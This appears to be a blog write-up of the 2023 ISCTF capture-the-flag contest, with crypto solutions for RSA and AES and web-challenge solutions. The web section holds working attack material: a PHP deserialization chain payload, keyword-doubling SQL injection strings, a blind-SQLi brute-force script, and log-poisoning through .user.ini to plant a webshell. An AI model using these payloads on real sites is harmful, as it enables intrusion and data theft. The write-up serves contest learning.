2023 ISCTF

ISCTF
match
发布日期:   2023-12-14
更新日期:   2023-12-14
文章字数:   1.3k
阅读时长:   7 分
阅读次数:  

MISC

签到

关注公众号回复即可

CRYPTO

七七的欧拉

import gmpy2
import libnum
e=8401285423075497989963572888601376313375827722858883767564499066473101615084214973041844878664837606157257039358849583049856161628241418012475432529735909
n=4321524416983780646994834778612486851863709339970595612409550086067211224407144019110798099401660010305645681548980160563216101786447875231976835115531375372678886339587480251211072894186558627897353793098608766868067029578667171419890150599640781594755080391489447462042167529203389236065727274166091741227068469987681083794139925327545810024038937132463518225611578727737940746784891867532498184642892826569777559107609493212332054559366409007685504768163376250281644004067745087899653778023414105973047620041288118404657934689253192043728590231618132716567084621670074256312939305265244486145758609971249077639085204680923108132415216543541472534580414274250979940330459551536830268428508217821060604260805109071534457808355664329902779603050878055690772430842865701249378096775899778255848773171108341331128673249899037133851535556515961699925809139476576825524135111237249709241579903807179252011010794867269715170739895392375920757559721516050680666658719990497863646989338960261844762127142439486275294670858114079687572243312184222126710967744971775585723045524467708387051034760208768956889939050498139189352842087278125173957182804116052402778416216669522309692266036094371308166663738284209615212016564171075874421472070422416318901926525719485991792111414333398004433143751908199358861514725313334333703539239414806773743941986164981642517673117412666430463318509571757766510835600758060976848374353352239044908034501477295696684294816091801944163877509558909040753907584672390823893991672246726026216973013330313971007514064831801564703364591696610900089228302936595848024616691878437618798864186634802647568239526771151323609650598156701595265876736712670677452013054393336294483452480213271032488201259990782289047132105989846972462094302132564809025802421057537091870932014884606863807260521123084423689494401900014232257381801590783735595575258160274248494498550583673688754220860142413631521279464318987425447302135444093663034598455694901199312497459228254746451233078954904159983269585883146959928222698672413648364391121696092287848931565798557217897678221379451042304811449415982434055522599829843482810025780349284547491767219221510351411192251236517341826619338084348136539121415210345488359563985046136632077665460793346345051213014836088333266911684271237227766588616771431226302155269893547077232087387411935345207081799500649921586279416751311277417949192360648342427657867424947189027886922112452681434778850977010752230391327878892161
c=1319666577538961333645698288755316431847498788803191213042970951363587036899021668814931340784440773619019635330248746606532233949080268712626456845590851812018539646705520729734738948568349756255640832936325965096602018372418260009779997764653043892043725224481361578258532294625476542003357969893609762981355267857532927948279737945466285738730414948695579002627741734690862181161919734547857550654813379550806374778412603233570494684223057004866601064851006909940259029023083838730497564657690493780040030061594915385886594845808342023634855913932575150487723897981518504381563064479784253539091893925934095008385592529031453149337783826491324308222762190756839839091742536583068791632135883271750510776330897598323339568926234205068941397524390446254057404779041850572848212437589629794980799894974937730065394307284096622814438575278571743516485062058882794531407454597341604166586040406867868323002258035737328450923576878935675998377134860357842547595516243737449809845708319003744144753130977649201725370898918939022097783844477196723482879094829249203949784703408369396219233552019108990900029123063369670129291960293576115301371071209198455299007327352602249399500334424934488528506773472420414119617828578424633182320749576697196936762283306228974126242434663703609495003656244194067493769815032134577138807799395279843708630774412341952691146906264694889245375545635688534662371202213660012977431598746482601668122679279419039288257069843297770840263002870206849857995148396439717143553611140228607531647245352254251824086797704561756363448681983654454393569932173970943157225527780067126895832370645456372127507057750232257828579628856504832975775855059816283684123444984393171125206440588627925736223222718784319209561804023835238526792966229582251575475514349566824846911411659740321154272534589694497411065971714157409318007179403833025337349924938487211920583780456897879801099476865645416182025930390267064170271613760577949655548949317295792361772032185463678410983568470647837758657058230086368185901572658482084202212103405161775243930901117532775865963215971025744893777631306256061896284125630451368067313753222195227231131526000755922331413457862253392530308284156400411897252674398583100198330007779643967156773216464341590817951828849769679134515304258819218015083183653130972243262400248230445031327719507314015062447355358100770763425336581258193908638241498461735819218673116282476452340137513156421147748432605954889277898079292196216
phi=euler_phi(n)
d=gmpy2.invert(e,phi)
m=pow(c,d,n)

print(libnum.n2s(int(m)))
# ISCTF{3237saq-21se82-3s74f8-8h84ps7-9qw45v7-6bs531-s26h23-c7iu01}

signin

c = 29897791365314067508830838449733707533227957127276785142837008063510003132596050393885548439564070678838696563164574990811756434599732001622138564176327233154381380717648392357672642893142367607369679906940371540867456654151408884171467638060523066406441697453971996011548195499549200103123841556085936672833238264876038160712793697159776332101536779874757463509294968879216810485825310481778472384531442206034564488532399171243463881900578407746982324779260941957792455217641883334131366614310644607114128868153897806362954456585661855569432513785225453501792356175649676419772626548071916379318631677869452985829916084336045071072493567871623113923140668031380684940109024609167449291380675124701557542736834722898328082888430566229322840781411336263268594978558564310744076581639469210462567543585251718744340216155557606004995449505782302864725856877289388008819135023371948017425832082773421030256964953984562211638060
n = 3231913372897424708803097969843687520868057190788284975066875241636436021279559026753076528399891936983240045179193386905918743759145596242896507856007669217275515235051689758768735530529408948098860529277921046146065473333357110158008648799207873976745048714516868561754202543130629713461365314627535982379718931633528922076268531363809414255082933615667770491818402126891370106045838695484124212397783571579791558324350069782623908757815983802849109451590357380624488436968737140312471089662428308113246310588336044438265822574558816510054763215983649467009345458480077882624118620789015758507736272402998721366662352794082495441303895025585316667229865533166614969641012195668280586477033200418153345241668242651407009849656745509386158276185301334443855737552801531617549980843398648751032649895403939319648954908487619711555700124294191702406981128355348449748466449951568451135718146828444185238617155432417897711198169
d = 220908195398117048628110042133057032501548264225985823161565460390793825899523662424732910718579350524590368287207857059670558852106434615134645183432670023784725430385048028248108677670095524205518013647694485975996499747580966911259433184798952372110628624294686853944766950244209186984164963987120416687012811346656498861438432610431705868541829977481875385468143747334359481673214618931159403123892213161430602430294790913847722073762999311674428134241956293914716183107414340330449465142849402354034926378025006749405210014879947411570380433942279355488861684317611066949685697268714760755591128598654573304969

from Crypto.Util.number import *



pq = GCD(n, pow(2, n*d, n)-2)
m = pow(c, d, pq)
print(long_to_bytes(m))
# b'ISCTF{aeb8be10-ff19-42cf-8cfd-2ce71ac418e8}'

EasyAES

先通过异或求key

def padding(m):
    tmp = 16 - m%16
    pad = hex(tmp)[2:].zfill(2)
    return bytes.fromhex(pad*tmp) + b'ISCTF{1'
a=padding(39)
print(a)


hint = 0x47405a4847405a48470000021a0f2870

from Crypto.Util.number import bytes_to_long, long_to_bytes
key = long_to_bytes(hint ^ bytes_to_long(a))
print(key)
#key=b'NISANISANISANISA'

求得key之后求IV

from Crypto.Cipher import AES


def calculate_iv(key, ciphertext, known_plaintext):
    cipher = AES.new(key, AES.MODE_CBC)

    # 解密首个密文块
    decrypted_block = cipher.decrypt(ciphertext[:16])

    # 计算IV
    iv = bytes(x ^ y for x, y in zip(decrypted_block, known_plaintext))
    return iv


# 已知的数据
key=b'NISANISANISANISA'
ciphertext = b'bsF\xb6m\xcf\x94\x9fg1\xfaxG\xd4\xa3\x04\xfb\x9c\xac\xed\xbe\xc4\xc0\xb5\x899|u\xbf9e\xe0\xa6\xdb5\xa8x\x84\x95(\xc6\x18\xfe\x07\x88\x02\xe1v'[:16]

known_plaintext = b'\t\t\t\t\t\t\t\t\tISCTF{1'

# 计算IV
iv = calculate_iv(key, ciphertext, known_plaintext)

# 输出计算得到的IV
print(iv)

求得的IV是变化的但是利用IV求flag变化的只是前面几位flag的内容不影响

from Crypto.Util.number import bytes_to_long, long_to_bytes
hint = 0x47405a4847405a48470000021a0f2870
key=b'NISANISANISANISA'
mes= long_to_bytes(hint ^ bytes_to_long(key))
print(mes)
ciphertext = b'bsF\xb6m\xcf\x94\x9fg1\xfaxG\xd4\xa3\x04\xfb\x9c\xac\xed\xbe\xc4\xc0\xb5\x899|u\xbf9e\xe0\xa6\xdb5\xa8x\x84\x95(\xc6\x18\xfe\x07\x88\x02\xe1v'
iv=            b'\x190\xb6]L\xdc\xd4\x05\x0fo\xca\x9e\xc3\x05Sj'
from Crypto.Cipher import AES

def decrypt_aes_cbc(ciphertext, key, iv):
    cipher = AES.new(key, AES.MODE_CBC, iv)
    plaintext = cipher.decrypt(ciphertext)
    return plaintext

# 已知的数据


# 解密得到明文
plaintext = decrypt_aes_cbc(ciphertext, key, iv)

# 输出原始明文
print(plaintext[9:])
# b'\t\t\t\t\t\t\t\t\tISCTF{1'
# b'\xbeX\x95z\xfe/\rb106cea3fb848e7bea310c9851f15c1}'

flag是39位 求得不变的是 b106cea3fb848e7bea310c9851f15c1}32位,加上ISCTF{1正好是39位

ISCTF{1b106cea3fb848e7bea310c9851f15c1}

WEB

圣杯战争!!!

<?php
highlight_file(__FILE__);
error_reporting(0);

class artifact{
    public $excalibuer;
    public $arrow;
    public function __toString(){
        echo "为Saber选择了对的武器!<br>";
        return $this->excalibuer->arrow;
    }
}

class prepare{
    public $release;
    public function __get($key){
        $functioin = $this->release;
        echo "蓄力!咖喱棒!!<br>";
        return $functioin();
    }
}
class saber{
    public $weapon;
    public function __invoke(){
        echo "胜利!<br>";
        include($this->weapon);
    }
}
class summon{
    public $Saber;
    public $Rider;

    public function __wakeup(){
        echo "开始召唤从者!<br>";
        echo $this->Saber;
    }
}

$a = new summon();
$a->Saber = new artifact();
$a->Saber->excalibuer = new prepare();
$a->Saber->excalibuer->release = new saber();
$a->Saber->excalibuer->release->weapon = 'php://filter/convert.base64-encode/resource=flag.php';
echo serialize($a);
?>
O:6:"summon":2:{s:5:"Saber";O:8:"artifact":2:{s:10:"excalibuer";O:7:"prepare":1:{s:7:"release";O:5:"saber":1:{s:6:"weapon";s:52:"php://filter/convert.base64-encode/resource=flag.php";}}s:5:"arrow";N;}s:5:"Rider";N;}

where_is_the_flag

蚁剑直接连接

image-20231130113044732

image-20231130113032259

image-20231130113125807

绕进你的心里

http://43.249.195.138:21043/?hongmeng[]=1&shennong[]=2&zhurong[]=a
import requests

url = 'http://43.249.195.138:21043/?hongmeng[]=1&shennong[]=2&zhurong[]=1'
data = {
    'pan_gu': 'very' * 250000 + '2023ISCTF'
}
r = requests.post(url=url, data=data).text
print(r)

easy_website

本来想用sqlmap但是好像有waf

通过测试 过滤了 or、空格 、union、select

双写绕过 or

username=1'/**/oorrder/**/by/**/1#&password=1

image-20231126150435180

则只有一列

读取数据库

username=1'/**/ununionion/**/selselectect/**/database()#&password=1

image-20231126150736138

读取表名

username=1'/**/ununionion/**/selselectect/**/group_concat(table_name)/**/from/**/infoorrmation_schema.tables/**/where/**/table_schema=database()#&password=1

image-20231126153449939

读取列名

username=1'/**/ununionion/**/selselectect/**/group_concat(column_name)/**/from/**/infoorrmation_schema.columns/**/where/**/table_name='users'#&password=1

image-20231126153647336

读取flag

username=1'/**/ununionion/**/selselectect/**/group_concat(user,passwoorrd)/**/from/**/users#&password=1

image-20231126153749895

wafr

说明 system可以用

image-20231126162046666

直接* 、\绕过

image-20231126162149173

ez_ini

对文件后缀和文件内容进行过滤了

发现过滤了< ,基本上不能用 post传码了

这里用日志注入

上传.user.ini

image-20231126165859320

access.log里面存放的是UA头

我们上传.user.ini之后可以查看

image-20231126170008680

然后通过把码写进UA头

image-20231126170035463

蚁剑连接

image-20231126170056714

image-20231126170122054

webinclude

目录扫描得到index.bak

image-20231127133020525

index.bak

 function string_to_int_array(str){
        const intArr = [];

        for(let i=0;i<str.length;i++){
          const charcode = str.charCodeAt(i);

          const partA = Math.floor(charcode / 26);
          const partB = charcode % 26;

          intArr.push(partA);
          intArr.push(partB);
        }

        return intArr;
      }

      function int_array_to_text(int_array){
        let txt = '';

        for(let i=0;i<int_array.length;i++){
          txt += String.fromCharCode(97 + int_array[i]);
        }

        return txt;
      }


const hash = int_array_to_text(string_to_int_array(int_array_to_text(string_to_int_array(parameter))));
if(hash === 'dxdydxdudxdtdxeadxekdxea'){
            window.location = 'flag.html';
          }else {
            document.getElementById('fail').style.display = '';
          }

chatgpt一键生成脚本

const targetHash = 'dxdydxdudxdtdxeadxekdxea';

function text_to_int_array(txt){
  return [...txt].map(char => char.charCodeAt(0) - 97);
}

function int_array_to_string(int_array){
  let str = '';

  for(let i = 0; i < int_array.length; i += 2){
    const charcode = int_array[i] * 26 + (int_array[i + 1] || 0);
    str += String.fromCharCode(charcode);
  }

  return str;
}

const reversedIntArr = text_to_int_array(targetHash);
const reversedParameter = int_array_to_string(reversedIntArr);
const reversedIntArr1 = text_to_int_array(reversedParameter);
const reversedParameter1 = int_array_to_string(reversedIntArr1);

console.log(reversedParameter1);

#mihoyo

根据提示include直接尝试get传参,读取flag.php

mihoyo=php://filter/convert.base64-encode/resource=flag.php

1zsql

import requests

url = 'http://43.249.195.138:22668/'
version ="version()"
database_len = "admin' and length(database()) regexp {i}#"  #6
db="select database()" #bthcls
table="select table_name from mysql.innodb_index_stats where database_name=database()"
col_name="select group_concat(column_name) from informatoin_schema.columns where tablen"
column= "select group_concat(username,password) from bthcls.users"

result=''
for i in range(1,20):
    for j in range(33,127):
        payload = f"admin' and ord(substr(({table}),{i},1)) regexp {j}#"
        data={'username':payload,'password':'123'}
        r = requests.post(url=url,data=data)
        if 'illegal words!' in r.text:
            result+=chr(j)
            print(result)
            break
        if j==125:
            exit(0)
文章作者: f14g
文章链接: http://example.com/2023/12/14/2023-ISCTF/
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 f14g !
ISCTF
评论
  目录